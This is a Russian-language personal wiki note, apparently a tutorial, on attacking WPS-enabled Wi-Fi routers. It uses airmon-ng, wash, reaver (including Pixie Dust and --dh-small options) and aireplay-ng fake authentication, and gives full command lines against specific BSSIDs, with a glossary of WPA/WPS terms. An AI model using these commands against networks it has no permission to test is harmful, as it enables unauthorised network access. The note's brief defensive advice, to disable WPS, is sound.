Reaver & Wash

Created Thursday 18 July 2024

Reaver это брут-форс, при хорошем сигнале точки доступа, процесс может занять от 4 до 8 часов и не факт что получится.  Использовать совместно с пакетом "aircrak-ng".

Для начала надо заметить, что в Reaver окончательно не решена проблема с аунтефикацией на точке доступа, причина в том что создавалась утилита для x86-64 использующие порядок байтов "Little-endian" LE - от меньшего к большему, в то время как большинство современных роутеров используют представление байт BE - от большего к меньшему "Big-endian" и конечно нужны обходные пути, поэтому возникновение ошибок: Sending EAPOL START request как и WARNING; Receive timeout occurred (произошел timeout) это врожденные недостатки Reaver. Утилита "aireplay-ng  из пакета aircrack-ng" это один из способов все это обойти.

Сканируем сеть с помощью  WASH, предварительно переведя в режим мониторинга:

# airmon-ng  start wlan0 

# wash -i wlan0mon 

airmon-ng перевел интерфейс в режим моноторинга и изменил название название интерфейса добавив окончание "mon", какое мы и будем в дальнешем использовать, это хорошо,  однако возможно понадобится отключить "руками" старый интерфейс:

# ifconfig wlan0 down 

BSSID                 Ch      dBm        WPS     Lck       Vendor              ESSID

B0:CC:FE:35:67:D8      1      -75        2.0      No       Unknown         

70:4F:57:AE:34:1E      1      -85        2.0      No       RalinkTe         

84:16:F9:6F:60:4A      1      -84        1.0      No       AtherosC          

48:22:54:A5:A4:BA      1      -89        2.0      No       RalinkTe          

B0:AC:D2:33:B5:F7      1      -90        1.0      No       RealtekS          

C8:D3:A3:E8:AF:C9      1      -85        2.0      No       Broadcom       

...........................................................................................................

Далее Reaver:

Атака на Wi-Fi с WPS, используя Reaver Reaver (reaver-wps-fork-t6x)

Reaver (reaver-wps-fork-t6x)

$ sudo reaver -i wlan0mon -b C4:04:15:8C:9B:78 -vv

-i — ключь используемый при запуске

Далее имя интерфейса  "wlan0mon"

-b — mac адрес точки доступа

-v  или  -vv  —вербальность, или количество показываемой информации

-A     — авторизацию производит другая программа

-p    — Если у вас уже есть пин, то для получения пароля Wi-Fi сети вам нужно в Reaver использовать опцию -p, после которой указать известный ПИН: # reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805

Для применения "Pixiewps"  (запуск  атаки "pixiedust") применить ключ "-K 1"

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv -K 1

"--dh-small" — вид атаки как  и "pixiedust"

Если точка доступа меняет каналы, Reaver соответственно тоже, но это можно отключить зафиксироваи канал интерфейса (--fixed)

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv --fixed

Если надо можно непосредственно указать канал ( -c 1  например):

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv --dh-small -c 1

Использование

Для преодоления выше упомянутых недостатков, то есть аунтефикации на точке доступе,  может помочь ручная аунтефикация с помощью утилиты "aireplay-ng  из пакета aircrack-ng (с ключем -А), ньюанс в том что утилита не умеет самостоятельно выставлять требуемый канал, поэтому ставят в ручную

# airmon-ng  start wlp8s0  — чем переводим интерфейс в режим моноторинга—

*** # ifconfig wlp8s0 down (возможно надо отключить)  # wash -i wlp8s0mon

# iwconfig wlp8s0mon channel 3 (например)

# aireplay-ng -1 5 -a C4:04:15:8C:9B:78 wlp8s0mon

После того как мы убедимся что аунтефикация проходит успешно надо прервать ее выполнение Ctl+C и перезапустить в фоновом режиме (или не закрывать терминал как минимум), но эстетичней foreground:

# aireplay-ng -1 5 -a C4:04:15:8C:9B:78 wlp8s0mon > /dev/null &  

Затем запускаем Reaver  c ключем -A который говорит ему что авторизацией будут за него заниматься другие

# reaver -i wlp8s0mon -b C4:04:15:8C:9B:78 -vv -A

Вообще появление ошибки "Receive timeout occurred" означит что авторизация не успешна и Reaver повторит попытку, если это происходит не постоянно то это не критично, можно сказать что подобные сообшения это вполне естественно в вербальном режиме..и конечно соединение должно быть надежным, то есть уровень сигнала высокий, если надо стоит увеличить мощность передатчика

PS:

HANDSHAKE  4-way-handshake   — 4-этапное рукопожатие  для генерации криптографического ключа. Злоумышленник заставляет жертву переустановить, текущий, уже используемый криптографический ключ на третьем этапе 4-этапного «рукопожатия», и соответственно узнает его.

       WEP Wired Equivalent Privacy  — алгоритм для обеспечения безопасности сетей Wi-Fi. Используется для обеспечения конфиденциальности и защиты передаваемых данных авторизированных пользователей беспроводной сети от прослушивания. Существует две разновидности WEP: WEP-40 и WEP-104, различающиеся только длиной ключа. В настоящее время данная технология является устаревшей, так как её взлом может быть осуществлен всего за несколько минут. Тем не менее, она продолжает широко использоваться. Для безопасности в сетях Wi-Fi рекомендуется использовать WPA.

WPS - Wi-Fi Protected Setup  — (защищённая установка) Целью протокола WPS является упрощение процесса настройки беспроводной сети, изначальноt называybt Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях. Официально используется с 8 января 2007 года.

WPA - Wi-Fi Protected Access, WPA2 и WPA3 — программы сертификации устройств беспроводной связи.В WPA обеспечена поддержка стандартов 802.1X, а также протокола EAP — Extensible Authentication Protocol, расширяемый протокол аутентификации. 

PS: Большим плюсом WPA является возможность работы технологии на существующем аппаратном обеспечении Wi-Fi, потому его везде и ставят.

WPA, по сути, является суммой нескольких технологий : WPA = 802.1X + EAP + TKIP + MIC

WPA2 — определяется стандартом IEEE 802.11i, принятым в июне 2004 года, и призван заменить WPA. В нём реализовано CCMP и шифрование AES, за счёт чего WPA2 стал более защищённым, чем свой предшественник. С 13 марта 2006 года поддержка WPA2 является обязательным условием для всех сертифицированных устройств Wi-Fi. Можно повторить для ясности, что пароли это WPA и WPA2. а WPS это пользовательскии инструмент настройки взвимодействия узла и точки доступа сертифицированного с помощью WPA/WPA2. WPS 2 соответственно WPS использующий WPA 2.

WPA3 — В начале 2018 года международный альянс Wi-Fi Alliance анонсировал новейший протокол беспроводной безопасности — WPA3. Основными дополнениями, реализованными в этом протоколе, станут: встроенная защита от брутфорс-атак (прощай reaver); индивидуальное шифрование данных для усиления конфиденциальности пользователей в открытых сетях Wi-Fi

WPA-PSK — WPA имеет упрощённый режим, получивший название Pre-Shared Key (WPA-PSK, Предварительно общий ключ). При применении режима PSK необходимо ввести один пароль для каждого отдельного узла беспроводной сети, если пароли совпадают с записями в базе, пользователь получит разрешение на доступ в сеть.

EAP — extensible authentication protocol, расширяемый протокол аутентификации (EAP) основа для механизма аутентификации пользователей.

EAPoL — extensible authentication protocol over LAN

Теория в том, что доступ к роутеру осуществляется по PIN-коду, который обычно пишется на коробке роутера, PIN-код WPS содержит 8 знаков (цифр), соответственно существует 10^8 вариантов, в процессе авторизации PIN-код делится нa 2 части обработка которых происходит независимо друг от друга, клиент и точка доступа обмениваются друг с другом последовательными сообщениями М1 - М8:

Received M1 message

Sending M2 message

Received M1 message

Sending WSC NACK          Wireless Support Complete (WSC) - Полная поддержка беспроводной связи (WSC)

Received WSC NACK

https://cybercop-training.ch/?p=97  https://cybercop--training-ch.translate.goog

Recived death requesn — # сообщение может свидетельствовать о том что надо перегрузить адаптер

Если после отправки М4 точка доступа отвечает кодом EAP-NACK, значит первая половина кода ошибочная

Если после отправки М6 точка доступа отвечает кодом EAP-NACK, значит вторая половина кода ошибочная

В процессе подбора можно заметить что количество отсылаемых - принимаемых сообщений сокращается это говорит о том что дело идет к завершению (как минимум процесс идет), как и значения подбираемых пинов 01315677, 01445671, 01465679, 01575675 и тд.

В чем уязвимость, уязвимость заключается в том, что метод авторизации содержит недочеты, позволяющие существенно упростить прямой перебор PIN-кодов, по сути– реализуется эффективная брутфорс-атака.

Немаловажная деталь втом, что на многих домашних роутерах PIN-авторизация: 

а) включена по-умолчанию; 

б) не накладывает никаких ограничений на отправителя при отправке множества некорректных PIN-кодов. 

Это открывает возможность по неограниченному перебору пин-кодов на таких роутерах.

**** Ctl+C прервет и сохранит сессию, позже предложит продолжить.

В качестве вывода можно сказать, что Reaver работает как бульдозер, то есть надежно, вопрос лишь во времени и сложности пароля, поэтому используя WiFi на предприятии используйте либо рендомные пароли а лучше отключите на хер WPS. 

PS: Для тех кто вообще не хочет ни в чем разбираться существует утилита wifite, примеры приводить нет смысла, все просто и быстро как в мире насекомых. С приходом WPA 3 вся эта брутфорс-лавочка закроется, а пока можно веселиться.